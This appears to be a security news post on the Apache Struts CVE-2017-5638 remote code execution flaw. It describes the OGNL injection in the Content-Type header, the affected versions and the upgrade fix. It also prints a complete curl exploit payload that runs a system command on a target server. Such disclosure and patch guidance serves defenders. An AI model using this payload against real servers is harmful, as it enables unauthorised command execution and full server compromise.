Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

By /

Listen to this Post

How the mentioned CVE works:

The vulnerability resides in the Jakarta Multipart parser of Apache Struts 2. When a file upload request is sent to a Struts-powered application, the framework incorrectly handles the `Content-Type` header. An attacker can craft a malicious `Content-Type` value containing an Object-Graph Navigation Language (OGNL) expression. Due to flawed exception handling, this expression is evaluated by the Struts framework. This evaluation happens before any application-specific data validation, allowing unauthenticated remote code execution. The malicious OGNL payload is interpreted, granting the attacker the ability to execute arbitrary system commands on the server with the same privileges as the application itself.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability : Remote Code Execution

Severity: Critical

date: 2017-03-07

Prediction: 2017-03-20

What Undercode Say:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target/upload.action`

How Exploit:

Craft malicious HTTP request with OGNL in Content-Type header.

Protection from this CVE:

Upgrade to Struts 2.3.32 or 2.5.10.1.

Impact:

Full server compromise, arbitrary command execution.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top